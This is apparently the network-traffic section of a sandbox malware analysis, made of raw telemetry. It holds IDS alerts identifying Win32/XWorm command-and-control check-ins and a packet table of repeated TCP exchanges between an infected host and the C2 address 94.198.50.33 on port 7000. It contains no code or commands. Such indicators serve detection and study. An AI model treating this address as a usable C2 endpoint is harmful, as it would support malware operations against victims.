                                          2024-09-25T09:31:31.751915+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:32.746951+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:31:32.746951+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.463994TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 25, 2024 09:27:53.004815102 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:27:53.009640932 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:27:53.009741068 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:27:53.174062014 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:27:53.178977966 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:02.698761940 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:02.740897894 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:03.806247950 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:03.811182976 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:04.018372059 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:04.020869017 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:04.025787115 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:14.445019007 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:14.449999094 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:14.657329082 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:14.661092997 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:14.667346954 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:25.084933043 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:25.093859911 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:25.301071882 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:25.305906057 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:25.310817003 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:32.951908112 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:32.951972961 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:32.952471018 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:35.725980043 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:35.731020927 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:35.939131975 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:35.973469973 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:35.978482008 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:46.366758108 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:46.371644974 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:46.579767942 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:46.582091093 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:46.586987972 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:57.007601023 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:57.012499094 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:57.437285900 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:57.439022064 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:28:57.439068079 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:57.439877987 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:28:57.447909117 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:00.179234028 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:00.408077002 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:00.615413904 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:00.617295027 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:00.622174978 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:02.698035955 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:02.740873098 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:06.475991964 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:06.480987072 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:06.691265106 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:06.693106890 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:06.697937965 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:12.132036924 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:12.142105103 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:12.344455957 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:12.346517086 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:12.353517056 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:12.366533041 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:12.373148918 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:12.428901911 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:12.433844090 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:12.731024027 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:12.732426882 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:12.738255978 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:12.896075010 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:12.900428057 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:12.905298948 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:13.727061987 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:13.732042074 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:13.939255953 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:13.943063974 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:13.947946072 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:18.101301908 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:18.106101036 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:18.313369989 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:18.315752983 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:18.320585012 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:28.741977930 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:28.746896982 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:28.954073906 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:28.955634117 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:28.960429907 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:32.147447109 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:32.152364969 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:32.359575987 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:32.361186028 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:32.366184950 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:32.720920086 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:32.850239992 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:35.023060083 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:35.028091908 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:35.235820055 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:35.238308907 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:35.243108988 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:36.100898981 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:36.109560013 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:36.313134909 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:36.315049887 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:36.319958925 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:44.335005999 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:44.339957952 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:44.547276020 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:44.548921108 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:44.553864956 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:49.522423983 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:49.527338982 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:49.741528988 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:49.743525982 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:49.752722979 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:53.584902048 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:53.590327024 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:53.797636986 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:29:53.800337076 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:29:53.805494070 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:00.038971901 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:00.043968916 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:00.251319885 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:00.253103018 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:00.258018970 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:02.734762907 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:02.787786007 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:04.295053959 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:04.300127983 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:04.507180929 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:04.509922981 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:04.514764071 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:05.756999016 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:05.766287088 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:05.882078886 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:05.891237020 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:05.972774029 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:05.974744081 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:05.983885050 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:06.007268906 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:06.012132883 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:06.053780079 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:06.062510014 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:06.093990088 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:06.095463991 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:06.397213936 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:06.509354115 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:06.509592056 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:06.511141062 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:06.511393070 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:06.516326904 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:06.537619114 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:06.540199041 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:06.591255903 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:06.722548962 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:06.724473953 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:06.729290962 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:06.840706110 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:06.842212915 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:06.847035885 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:11.459927082 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:11.464795113 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:11.672331095 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:11.675185919 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:11.679997921 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:22.100681067 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:22.105638981 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:22.313051939 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:22.318073988 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:22.322879076 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:24.131768942 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:24.136661053 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:24.344351053 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:24.399046898 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:24.406760931 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:24.411565065 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:32.749389887 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:32.803392887 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:33.256794930 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:33.264054060 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:33.468955994 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:33.470999002 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:33.475828886 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:43.897694111 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:43.902906895 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:44.110693932 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:44.112759113 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:44.117590904 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:48.147408009 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:48.154176950 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:48.178611994 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:48.183511019 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:48.194184065 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:48.198968887 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:48.363811016 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:48.365840912 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:48.374316931 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:48.480094910 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:48.481637001 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:48.491703987 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:48.599725962 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:48.601532936 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:48.606334925 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:52.694269896 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:52.699177027 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:52.907250881 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:52.909141064 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:52.913980961 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:53.522452116 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:53.527265072 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:53.585320950 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:53.590248108 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:53.678706884 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:53.684535980 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:53.694315910 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:53.700206041 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:53.735987902 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:53.737447023 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:53.786870003 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:53.853121042 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:53.854626894 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:53.859474897 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:53.971785069 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:53.973140955 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:53.978791952 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:54.038069963 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:54.042960882 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:54.089901924 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:54.091411114 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:54.096239090 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:54.370853901 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:54.373408079 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:54.378415108 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:57.071039915 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:57.076065063 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:57.283155918 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:57.289124012 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:57.294163942 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:58.883038998 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:58.887784958 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:59.094980001 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:59.134394884 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:59.139293909 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:59.553642035 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:59.558505058 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:59.765582085 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:30:59.767138958 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:30:59.771892071 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:02.743288040 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:02.787904024 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.053642035 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.058557987 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.069329023 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.074158907 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.084947109 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.089835882 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.116280079 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.121156931 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.131917953 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.136784077 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.148066998 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.152915955 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.178845882 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.183655977 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.211028099 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.215807915 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.241350889 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.246212006 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.265399933 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.269985914 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.318972111 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.384804964 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.386296034 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.391185999 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.428679943 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.433748007 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.476265907 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.481257915 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.502897024 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.504499912 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.554968119 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.555038929 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.559969902 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.569406986 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.574280024 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.584822893 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.589812040 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.600707054 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.605604887 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.621012926 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.627790928 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.674948931 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.675018072 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.679881096 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.725581884 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.730640888 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.739639997 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.741411924 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.794877052 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.794925928 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.800856113 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.857852936 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.859321117 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.864315987 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.980077982 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.982130051 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.989408016 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:05.989514112 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:05.995764017 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:06.098488092 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:06.100063086 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:06.108875036 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:06.108967066 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:06.115020037 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:06.215857029 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:06.217483044 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:06.226468086 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:11.163146973 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:11.168148041 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:11.375638962 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:11.383034945 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:11.388170958 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:14.539665937 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:14.544665098 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:14.753526926 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:14.755265951 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:14.760268927 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:23.084893942 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:23.089742899 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:23.297102928 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:23.300481081 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:23.305373907 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:31.538032055 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:31.543318033 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:31.751048088 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:31.751914978 CEST639947000192.168.2.494.198.50.33
                                          Sep 25, 2024 09:31:31.756736040 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:32.746951103 CEST70006399494.198.50.33192.168.2.4
                                          Sep 25, 2024 09:31:32.850321054 CEST639947000192.168.2.494.198.50.33
                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 25, 2024 09:27:28.208311081 CEST5784453192.168.2.41.1.1.1
                                          Sep 25, 2024 09:27:28.229316950 CEST53578441.1.1.1192.168.2.4
